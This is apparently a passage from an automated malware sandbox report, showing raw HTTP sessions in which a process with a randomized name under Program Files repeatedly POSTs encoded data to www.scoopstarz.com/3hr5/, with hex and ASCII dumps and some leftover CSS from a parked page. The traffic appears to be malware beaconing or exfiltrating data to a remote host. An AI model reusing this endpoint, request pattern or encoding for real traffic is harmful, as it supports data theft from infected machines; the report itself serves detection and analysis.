                                                                                                                              Dec 4, 2023 15:25:10.950206995 CET1340INData Raw: 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63
                                                                                                                              Data Ascii: -color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switc
                                                                                                                              Dec 4, 2023 15:25:10.950299978 CET1340INData Raw: 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b
                                                                                                                              Data Ascii: ax-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147px;fle
                                                                                                                              Dec 4, 2023 15:25:10.950356007 CET1340INData Raw: 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f
                                                                                                                              Data Ascii: er-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{paddin
                                                                                                                              Dec 4, 2023 15:25:10.950436115 CET1340INData Raw: 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e
                                                                                                                              Data Ascii: ment{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchiv
                                                                                                                              Dec 4, 2023 15:25:11.132544041 CET1340INData Raw: 51 3d 3d 5f 4a 53 77 6e 49 6f 41 50 49 2b 6e 69 67 45 55 34 68 5a 6c 53 70 56 66 56 78 63 57 31 6e 77 4e 30 70 7a 69 68 66 65 63 49 65 49 37 6d 39 55 51 68 6d 77 50 68 46 56 31 34 35 46 6b 30 57 72 48 50 6c 39 49 77 45 72 6c 47 75 71 4b 50 47 46
                                                                                                                              Data Ascii: Q==_JSwnIoAPI+nigEU4hZlSpVfVxcW1nwN0pzihfecIeI7m9UQhmwPhFV145Fk0WrHPl9IwErlGuqKPGF/96bRysg==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":tr


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.11.2050172172.67.202.151808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:16.414796114 CET807OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.scoopstarz.com
                                                                                                                              Referer: http://www.scoopstarz.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4e 72 51 7a 42 37 35 62 41 48 44 74 6b 35 47 76 6d 79 38 4b 6d 4c 44 77 58 52 6a 34 65 6e 78 65 55 79 64 43 38 6c 70 73 53 36 4a 6b 6b 72 76 5a 42 43 4d 2b 41 38 4f 66 45 46 44 32 41 35 63 33 43 42 75 64 46 34 73 47 73 6f 48 74 68 55 6c 7a 30 62 31 4b 4f 77 47 46 4a 79 45 39 44 37 6a 6f 37 71 35 4e 74 54 70 31 44 52 37 49 48 66 47 6d 34 45 65 77 54 6c 4d 31 43 36 67 30 7a 67 45 77 4d 37 51 70 50 65 47 71 63 46 33 4e 6f 61 4b 7a 4a 76 5a 41 61 46 58 65 37 64 51 38 72 55 61 76 33 36 32 46 56 73 78 35 34 4c 69 7a 30 79 4a 57 6a 41 3d 3d
                                                                                                                              Data Ascii: TZd=NrQzB75bAHDtk5Gvmy8KmLDwXRj4enxeUydC8lpsS6JkkrvZBCM+A8OfEFD2A5c3CBudF4sGsoHthUlz0b1KOwGFJyE9D7jo7q5NtTp1DR7IHfGm4EewTlM1C6g0zgEwM7QpPeGqcF3NoaKzJvZAaFXe7dQ8rUav362FVsx54Liz0yJWjA==
                                                                                                                              Dec 4, 2023 15:25:16.662198067 CET588INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:16 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yaMdYCaxsyZm%2BnnAGn6wfAMsDFbhqsAoKuIfYOfyEWAXxjIdIanL7Ywvo9cGfgjdZgEr83rPGSWI85aZJRtn65zhEdNCeb0nvbdLts3ZwWMGSR2YnJopP7VySZC3m%2BohyXX1hc0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7bdec98184d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.11.2050173172.67.202.151808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:19.028644085 CET1147OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.scoopstarz.com
                                                                                                                              Referer: http://www.scoopstarz.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4e 72 51 7a 42 37 35 62 41 48 44 74 6b 5a 32 76 6a 52 45 4b 67 72 44 7a 62 78 6a 34 56 48 78 61 55 79 52 43 38 6b 73 78 48 59 64 6b 6e 4f 54 5a 43 48 67 2b 48 38 4f 66 4b 6c 44 2f 64 70 63 38 43 42 6a 6f 46 35 67 47 73 73 6e 74 67 6e 39 7a 79 72 31 46 42 51 48 33 4f 79 45 38 48 37 6a 6d 37 71 30 6d 74 53 74 31 43 67 58 49 57 70 79 6d 70 6d 36 78 5a 56 4e 2b 41 36 67 33 35 41 45 79 4d 37 4d 4c 50 65 75 36 63 53 4c 4e 6f 36 71 7a 49 76 5a 66 4e 6c 58 6e 6a 64 52 70 6f 6d 44 6c 77 5a 75 42 4b 50 78 38 30 70 4c 38 39 79 51 61 35 35 58 64 7a 39 69 47 66 52 5a 78 35 49 6c 46 77 6e 54 75 77 55 6a 36 2f 72 73 57 35 45 32 2f 54 30 77 47 52 35 4c 64 64 71 48 64 4f 67 32 37 4a 6d 2f 6d 62 69 72 2b 57 54 73 69 4d 4b 75 42 68 50 34 74 6f 2b 6c 31 79 49 58 48 47 57 5a 64 4a 47 35 53 41 58 59 47 4a 6a 70 34 75 37 35 56 63 64 4e 78 7a 42 79 32 57 2f 68 38 41 72 75 72 61 62 34 54 6d 35 65 44 72 31 72 72 76 77 34 6a 53 37 2b 46 73 4d 4e 54 59 53 53 69 6c 4a 59 2b 68 72 4c 70 71 45 65 66 33 68 77 34 4f 76 38 30 63 54 37 78 6f 6e 34 33 58 53 2f 41 53 6b 67 70 47 6e 61 43 76 46 34 41 2b 68 59 32 5a 4d 75 35 6d 70 47 2b 59 45 59 62 42 33 72 4d 76 71 70 55 56 74 61 2f 4e 46 71 6e 71 39 68 77 4c 4a 68 69 77 6c 65 4f 42 4c 4a 41 49 31 6c 2b 33 4a 46 2b 39 6c 4b 5a 6e 70 39 61 49 6b 43 74 53 4e 41 51 79 66 4b 6f 6b 2f 4a 49 63 78 4a 4f 38 54 56 68 5a 73 2b 75 6f 6c 66 6a 56 32 7a 6e 61 33 63 34 67 4e 57 36 51 55 45 72 61 41 4b 42 53 6d 5a 6f 31 67 50 5a 31 51 41 6a 57 79 75 74 55 73 70 59 6d 44 39 62 67 31 74 73 73 7a 51 6e 6b 74 2f 41 39 53 63 69 74 77 4d 3d
                                                                                                                              Data Ascii: TZd=NrQzB75bAHDtkZ2vjREKgrDzbxj4VHxaUyRC8ksxHYdknOTZCHg+H8OfKlD/dpc8CBjoF5gGssntgn9zyr1FBQH3OyE8H7jm7q0mtSt1CgXIWpympm6xZVN+A6g35AEyM7MLPeu6cSLNo6qzIvZfNlXnjdRpomDlwZuBKPx80pL89yQa55Xdz9iGfRZx5IlFwnTuwUj6/rsW5E2/T0wGR5LddqHdOg27Jm/mbir+WTsiMKuBhP4to+l1yIXHGWZdJG5SAXYGJjp4u75VcdNxzBy2W/h8Arurab4Tm5eDr1rrvw4jS7+FsMNTYSSilJY+hrLpqEef3hw4Ov80cT7xon43XS/ASkgpGnaCvF4A+hY2ZMu5mpG+YEYbB3rMvqpUVta/NFqnq9hwLJhiwleOBLJAI1l+3JF+9lKZnp9aIkCtSNAQyfKok/JIcxJO8TVhZs+uolfjV2zna3c4gNW6QUEraAKBSmZo1gPZ1QAjWyutUspYmD9bg1tsszQnkt/A9ScitwM=
                                                                                                                              Dec 4, 2023 15:25:19.274487972 CET586INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:19 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5d6r45Ffvzt9P8HWlmwvEiooOeXO0Bmjl4dolBIJ1nQ7XIw80U37rp1DCtzwQqm3U7DjQ656seVmLtR2zuQPdCoaaOUXtgajPNbONyNKRpdzHV10aNp3yCmmSdbNeh9%2BdNARF3M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7ce4cfc0f5d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.11.2050174172.67.202.151808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:21.653796911 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.scoopstarz.com
                                                                                                                              Referer: http://www.scoopstarz.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4e 72 51 7a 42 37 35 62 41 48 44 74 6b 5a 32 76 6a 52 45 4b 67 72 44 7a 62 78 6a 34 56 48 78 61 55 79 52 43 38 6b 73 78 48 59 46 6b 6e 34 6e 5a 41 6b 59 2b 47 38 4f 66 43 46 44 79 64 70 63 68 43 42 37 73 46 35 63 38 73 75 66 74 67 77 68 7a 79 5a 64 46 4b 77 47 51 53 43 45 79 44 37 6a 36 37 71 34 79 74 57 46 6c 44 52 54 49 48 61 36 6d 34 6d 47 77 66 31 4d 31 41 36 67 37 75 51 45 63 4d 37 59 41 50 65 79 36 63 57 33 4e 70 49 69 7a 4c 34 31 66 4a 31 58 6b 71 39 52 79 6a 47 44 63 77 5a 4c 36 4b 50 77 4a 30 6f 50 38 39 77 59 61 34 35 72 63 7a 64 69 47 45 52 5a 79 39 4e 39 42 77 6d 2f 6d 77 55 58 36 2f 72 30 57 34 6b 32 2f 42 46 77 4a 42 70 4c 58 5a 71 47 64 45 77 4c 58 4a 6d 72 63 62 6e 54 2b 56 6e 4d 69 4d 39 79 42 6e 74 41 74 71 65 6c 33 32 49 58 55 4d 32 59 45 4a 47 49 7a 41 54 6f 38 4a 6a 4e 34 38 71 5a 56 59 4a 35 75 77 68 79 38 5a 66 68 70 45 72 69 6e 61 62 49 50 6d 35 65 71 72 30 2f 72 73 44 67 6a 52 36 2b 47 74 38 4e 55 55 79 53 4e 73 6f 6b 6b 68 74 76 68 71 45 47 50 33 69 38 34 4f 50 38 30 5a 30 76 79 67 58 34 77 65 79 2f 6f 63 45 67 41 47 6e 6d 65 76 45 38 36 2b 77 30 32 61 63 65 35 71 5a 47 68 54 30 59 66 62 48 72 77 2b 36 70 55 56 74 65 46 4e 46 6d 6e 72 4d 5a 77 45 62 4a 69 67 47 32 4f 44 4c 4a 47 49 31 6c 4e 33 4a 41 4b 39 6c 43 37 6e 70 4d 2f 49 6d 4f 74 63 35 6b 51 31 64 69 70 67 50 4a 4a 52 52 49 55 68 44 49 33 5a 73 69 6d 6f 6c 50 56 56 48 54 6e 62 33 73 34 74 74 57 35 56 30 45 6f 64 41 4b 74 57 6d 64 30 31 67 44 6a 31 55 4a 38 57 77 75 74 57 5a 6b 58 77 44 39 68 35 30 39 7a 67 56 34 4a 6d 36 48 39 71 52 55 7a 78 58 34 63 34 69 48 46 52 4a 77 57 66 44 63 33 47 38 7a 69 44 41 4f 35 6c 69 4d 4e 77 6d 77 51 6c 33 2f 6f 30 45 51 33 7a 35 78 50 62 48 72 63 63 45 72 72 5a 6b 72 56 42 5a 79 56 32 41 57 47 67 37 59 6a 62 50 47 5a 45 39 61 74 56 36 49 72 6a 44 41 49 6a 45 6c 66 55 47 75 4a 4a 74 6c 45 4a 55 56 56 72 6c 4a 66 78 58 6f 4c 57 66 4c 66 68 38 6d 36 54 35 71 6f 66 7a 73 34 6e 45 4a 61 36 73 4a 44 4b 47 42 30 43 4f 4f 36 51 58 71 46 57 58 49 36 68 39 6c 43 55 48 62 47 38 54 75 65 44 7a 6a 6b 65 54 2f 30 55 63 67 57 2f 5a 32 69 31 6c 51 58 73 4a 32 67 55 58 67 36 43 6a 67 54 5a 51 78 53 6b 42 76 63 61 31 41 74 50 48 7a 75 7a 36 47 6b 64 64 76 56 35 4a 50 44 54 4b 68 30 34 76 55 4d 51 53 47 39 37 4f 61 65 71 7a 39 54 53 31 6d 6d 52 6b 44 73 70 56 5a 33 30 37 7a 4f 35 68 4a 44 50 4a 4c 64 61 36 7a 56 64 6d 4a 38 6c 31 66 55 73 51 74 2f 6d 4c 32 53 77 2f 66 75 70 38 55 58 49 6a 41 72 5a 52 35 6a 68 55 66 73 2b 4f 55 39 43 53 35 72 2b 42 4b 78 70 63 6e 64 57 48 79 69 64 37 49 4f 67 36 69 38 6f 58 5a 70 45 46 76 71 70 64 4c 6f 2f 74 73 63 48 63 38 4e 4f 4b 74 4a 59 68 79 4d 4b 45 6f 69 4e 51 6e 35 6c 44 56 35 6d 6e 4b 77 69 2f 70 51 67 31 4f 68 73 49 6f 45 61 34 42 76 4c 54 30 59 2b 75 43 43 4d 41 67 75 6d 5a 53 70 63 2f 35 64 6c 6e 31 53 44 42 2b 61 36 55 55 31 35 71 6c 35 68 43 56 32 56 36 55 4f 38 75 2f 38 79 49 48 37 54 69 48 35 62 36 6f 45 36 51 2f 54 7a 38 78 58 55 33 48 77 76 4c 6e 7a 5a 43 5a 33 63 65 4b 46 4f 37 79 48 70 4f 53 63 2f 2b 4d 62 52 67 4d 74 77 36 71 41 37 77 32 56 66 56 71 73 73 67 39 39 32 41 67 34 6f 53 37 4f 6b 74 36 4a 55 46 6b 35 50 61 39 74 6c 79 41 46 37 64 46 73 6b 66 35 4c 79 57 6a 78 44 37 6d 5a 72 2b 77 6c 61 59 2b 78 7a 56 59 2b 44 56 6c 31 2b 33 54 70 4a 39 76 36 4c 31 41 78 52 66 6b 4c 70 56 53 64 50 7a 6e 56 65 79 46 6d 59 49 4b 7a 36 66 4d 55 30 6d 56 37 49 64 63 62 61 55 7a 34 66 76 65 61 77 4c 53 65 69 68 71 33 62 78 45 66 38 31 41 6a 75 42 63 72 70 68 6d 7a 5a 6d 45 33 6e 69 66 75 30 47 49 44 37 46 61 66 41 67 76 71 44 52 63 6e 76 42 76 4e 47 31 67 42 41 43 48 64 64 39 53 71 32 55 38 48 33 62 2b 65 76 66 41 4c 70 49 33 68 52 78 64 77 73 31 37 67 6f 57 6a 41 46 6e 65 50 78 58 73 50 58 46 45 79 49 34 41 65 56 4e 56 59 38 73 4d 31 2f 74 41 49 61 71 34 6d 39 59 4a 64 74 74 49 61 47 6d 77 4a 58 34 54 32 77 62 31 34 63 70 6c 37 6e 6f 4e 2f 52 75 34 59 4e 4d 6f 38 66 77 51 6e 44 77 4c 67 58 48 36 55 48 35 37 38 35 45 36 41 47 48 76 70 4e 34 45 45 35 38 64 65 48 30 72 79 6f 37 7a 43 79 65 4e 4d 48 44 4f 6c 58 74 44 37 6c 38 6e 46 70 79 57 55 74 74 51 5a 44 4a 75
                                                                                                                              Data Ascii: TZd=NrQzB75bAHDtkZ2vjREKgrDzbxj4VHxaUyRC8ksxHYFkn4nZAkY+G8OfCFDydpchCB7sF5c8suftgwhzyZdFKwGQSCEyD7j67q4ytWFlDRTIHa6m4mGwf1M1A6g7uQEcM7YAPey6cW3NpIizL41fJ1Xkq9RyjGDcwZL6KPwJ0oP89wYa45rczdiGERZy9N9Bwm/mwUX6/r0W4k2/BFwJBpLXZqGdEwLXJmrcbnT+VnMiM9yBntAtqel32IXUM2YEJGIzATo8JjN48qZVYJ5uwhy8ZfhpErinabIPm5eqr0/rsDgjR6+Gt8NUUySNsokkhtvhqEGP3i84OP80Z0vygX4wey/ocEgAGnmevE86+w02ace5qZGhT0YfbHrw+6pUVteFNFmnrMZwEbJigG2ODLJGI1lN3JAK9lC7npM/ImOtc5kQ1dipgPJJRRIUhDI3ZsimolPVVHTnb3s4ttW5V0EodAKtWmd01gDj1UJ8WwutWZkXwD9h509zgV4Jm6H9qRUzxX4c4iHFRJwWfDc3G8ziDAO5liMNwmwQl3/o0EQ3z5xPbHrccErrZkrVBZyV2AWGg7YjbPGZE9atV6IrjDAIjElfUGuJJtlEJUVVrlJfxXoLWfLfh8m6T5qofzs4nEJa6sJDKGB0COO6QXqFWXI6h9lCUHbG8TueDzjkeT/0UcgW/Z2i1lQXsJ2gUXg6CjgTZQxSkBvca1AtPHzuz6GkddvV5JPDTKh04vUMQSG97Oaeqz9TS1mmRkDspVZ307zO5hJDPJLda6zVdmJ8l1fUsQt/mL2Sw/fup8UXIjArZR5jhUfs+OU9CS5r+BKxpcndWHyid7IOg6i8oXZpEFvqpdLo/tscHc8NOKtJYhyMKEoiNQn5lDV5mnKwi/pQg1OhsIoEa4BvLT0Y+uCCMAgumZSpc/5dln1SDB+a6UU15ql5hCV2V6UO8u/8yIH7TiH5b6oE6Q/Tz8xXU3HwvLnzZCZ3ceKFO7yHpOSc/+MbRgMtw6qA7w2VfVqssg992Ag4oS7Okt6JUFk5Pa9tlyAF7dFskf5LyWjxD7mZr+wlaY+xzVY+DVl1+3TpJ9v6L1AxRfkLpVSdPznVeyFmYIKz6fMU0mV7IdcbaUz4fveawLSeihq3bxEf81AjuBcrphmzZmE3nifu0GID7FafAgvqDRcnvBvNG1gBACHdd9Sq2U8H3b+evfALpI3hRxdws17goWjAFnePxXsPXFEyI4AeVNVY8sM1/tAIaq4m9YJdttIaGmwJX4T2wb14cpl7noN/Ru4YNMo8fwQnDwLgXH6UH5785E6AGHvpN4EE58deH0ryo7zCyeNMHDOlXtD7l8nFpyWUttQZDJudI+5TeyOwuSEyOauLFR4Q8huPNsLQjtIq5CXrLnuHvzPOxJVhAM3qnCznjlfgHBszUJqX8I9n9Jv1DNGLTRbOm2ABoGUqy8HY+PtSVFSdC9Ug2StUTQb2SM+knPmcJY9fWZJ5KRYqePwKxb4zI3W18yJ7aT+mzkntzqZu3ExA2rjMPaac1tKwJpNMWhUhY0TqtsvWYtPLQIwkAC6rROYLQJDm56CZcTyRgnnh2Oz9YHRy69LsYqpvI3teFvvmj3SBOX5FJgucXttiIVa1rinfEAMaLNK+Vf0ZusyFw6TrTY81N104DILRRWeQZINpPuXLoHOCm2ZTdDayXn0QdYURQcnBS0Synz/1G7BznCHD84G7Gixje6+YsZCGUFIw9WFWdu1GUn0UaTocl9BRLKJrx06bWTq4XSo7BbQp57jqpWDH9tew1YC8INB3HIDMXlXE7BoE9nhIa37AavKZn2URoci7jYCKk59mlNKprpCtZU1NcoLxt9YYXpJNgxwUhO7P38Vl7dIkNu/4nqhlQFia9NSoLlF2szvGYa7B2VhddvMHeFJg+NKu73hC4mCbriIgnNHZngoBSV9fKvxhetFuejtKil74sHDQUuKuNkUqPu/JtUAYYwzrKgq5v8AhSvUuVZDmV8y4Ng0ZHNeKaNF6WfM+VN3hytZrFQeFUmReaA+1KveSRfI7/h0JMJGntxFr2PJTiD0U9HJ8zuyYjgDEdZAM3F7KqZtG1a2GXLos4Gy+PB6j/RkUx/0x9tZAkIGIqXSXm9Tf0qL1NrnyYObnKdAdNoaZGVELjDQByyjNG6+M8Maq8VlJcPd/Y0FZjAd95qvnLGYhMlSXECkOhNmIko3kATqFPwAY72JROFVFTGa0GYW0lAPckaB3hYjLLyHPNz2xuo6ZBYQRpwm7jsiuuXiJxgDTz60ymOo2fPc2aHeB0G2sNGzGWLQ5Xe5ZPoAOIVFMPTIDxOUgYVZqrUT5s72+EzDrN2zAKrmX8hl8NrHERS5EtfKIIJ4dxEUI0w5pUd9CFFWqwXpamWFi9j15ywCy17emyA6aQLk5G2WlB2icsRdqPbLNFB9jd3xfniaaXUuvHSRrZBrfmEoCQPdkvezgpGLOCO6C+0ZNbSWk6btZrUj55rexJanW5Q5/MIOGMKT30jRr/vZ4aubGnItpSsf6EZQbFPh/WCFekei7V7sF17seh8wUwBKcfDLLpxRoIHQNHXa59kJw54Bq+FMhdjgTqndpw+IkwuvC2uqxULa76rHtmUVxsJJcWx64fBoXGuXhEENQDp6joh7OaeWzyd+3WGrPTerxMt308ZBihQ852dbDF7p2OPxeOT8Xa2fxMIjhoykDg4pTtX3Laqqv5vJjEjOadC5U8yu+Kl/Ucr0/jbfFtVphcCgCMIojZY2EyL+5M0dKMZsXUb87d9P2/SD0F44tUSIYv49znHdRPGoNa+VcsY94zS/H8EPnn4cMDkXFQqcdInX6L6D7OudgjoFyrVTjY40YuTLzsuuDpDxnx7FoY0ySxt270r5PTwmuFavQy1qB6LpGpzDXpdwPwxmyQPJgesE/hKtB82chH3VM/j6sbJbv3fUtUWlRkCtGe6zRWxMYYf/rbadykBpSCaZVBuBPPKoXdWCB5ey5N5loUk/SJpOV67nXdpsqAgfAZ0468caFWYCpv5G2F97LAukk3AJxuf3B1dAaDHzyOWPmRVNraYlmTS5jerFUCqp0RK1r7VAsTM6UP/80qbJUx30AYbh+wcbAKWrTljSyvNIkPhO3PIigg2uwG6zjmjoBAq2g2Uwx0Ye0YSruLcx6D3JlQhzrXo0iFnUrlt5cWOYzoWKVDZRQvZSQn5Uubcxtcr+nxGxSdGQqyqCkvO5nT8TuWaclk8JJR1vUp3TE0LABQXl5b1Cz1WPaiXPq08XV9tXJePw5uuaRkY5VfpOn8jqP+KOuCZgZNThTrBci3cHjRd3//zgntQ10Ag8c/MzeXGM15hNQaZdJJwYAe1QS0S2N0MhB6Dqp5SfRaBqpqLhXZb0ZVUJR/mDgV0Xy28l4OtYwcKCOBMH8B3434egEME8QHQz+BR8ynAnUuWqox170/2Ng3TzE60bIwm0kgYHZRitgM49od60gl/vMKl8gV8Gwp8+AV49oSuW9B8BdcaJ+vEymYAHRlFo9YEUGJeIIlzq59SRNY+IJD2+jD+AP1SUo7vN8hPOZRpeK201uXzYmDOCsgRnkR6BNYSsjaNm86TRzCM1fnFtkdxaeNTUXz9LCmLLaRLZr/DYcMWxXZXGwcSRwsMhAD6/iXBI1f+5VgSGnwBdAZcOEvp1HtTBuzjg2Seso6K+XELCD4/MripbfLDiQFPbfyQoWA5aXXyES6BMea0NVg9viQ3yRMf6NTdX1B3BngDIQpnoSK9IzD9jT3HXvOJ1IpTFG4F6W+/BK3n6BmpnmImameJ5Pxu1I8P1RDWQ7RYDfQT50FtdBkrItEmCP6OEoB17RqvINEYGIWH1yesGGxBMoRae5lXk57iqrhTsT1evMsBEPAotTO21vjd6JHL/zFJezy+/J3Z7Xk87rkrMU8cacq99z3SIUwOB9YRQXNkbsh7JYtE7iEPDU+LApoESIvP/gr00nv+g5YdGPB4vUHqM5HlznjmtZE8LqUR+tyal/U7aX5eSBfhleJ0G+7QXDOq/IGvW/Oi4sPBkWIJaCYjQbVKYn6nUBShDe89i1Jr6iPv
                                                                                                                              Dec 4, 2023 15:25:21.748586893 CET2626OUTData Raw: 33 59 32 4c 42 2f 34 65 2b 30 77 71 78 49 4d 5a 2f 59 32 76 56 68 5a 63 48 6e 64 62 2b 76 75 2f 45 2f 62 73 67 4d 64 36 49 79 48 76 68 77 4f 79 4e 76 2b 4e 50 6a 73 59 4f 78 43 36 59 55 38 51 58 4f 62 53 65 30 43 67 71 32 66 58 6f 78 30 5a 61 6f
                                                                                                                              Data Ascii: 3Y2LB/4e+0wqxIMZ/Y2vVhZcHndb+vu/E/bsgMd6IyHvhwOyNv+NPjsYOxC6YU8QXObSe0Cgq2fXox0ZaoYN6VgYeDFaoKz/J0mwG8o/tVyo0tsgIA9f3XlJysQ7/MrvTtw7TKkKHv3857lqaCTvw2kweXBYoUto5fJ5as70AUOiJjd/ICnGqhwDd1Hgf0y6QPY3FqgwWrDluqse1zRO4kD8heI69pj+U8+KOFgVdeWMQOeCXyj
                                                                                                                              Dec 4, 2023 15:25:21.748667955 CET2626OUTData Raw: 75 4a 65 65 49 62 45 4f 4a 4a 45 65 4f 76 32 78 69 2b 4e 64 30 52 36 54 49 6c 7a 35 31 50 2b 37 41 6f 5a 51 46 77 4a 47 4c 65 42 57 77 41 59 64 51 2b 4c 58 4b 55 56 73 69 61 77 43 44 35 64 46 70 71 36 35 6d 49 65 4e 30 4e 71 72 74 65 61 65 46 47
                                                                                                                              Data Ascii: uJeeIbEOJJEeOv2xi+Nd0R6TIlz51P+7AoZQFwJGLeBWwAYdQ+LXKUVsiawCD5dFpq65mIeN0NqrteaeFG9SjCVhLqwwWIUlUtBnEKe7pM4guApSjX6kfVE8wQIxBnF4I0lY7sZVq3gpKZn3GaeVzeHOrPiAhAaHMpmWfFVKmfEZR6s3LjJZOlBhwwcORyyYZJ9vjn2TcwtDffrbsMlQL0oCFPAhaT8uLc68/vyrywV0yA9d4hl
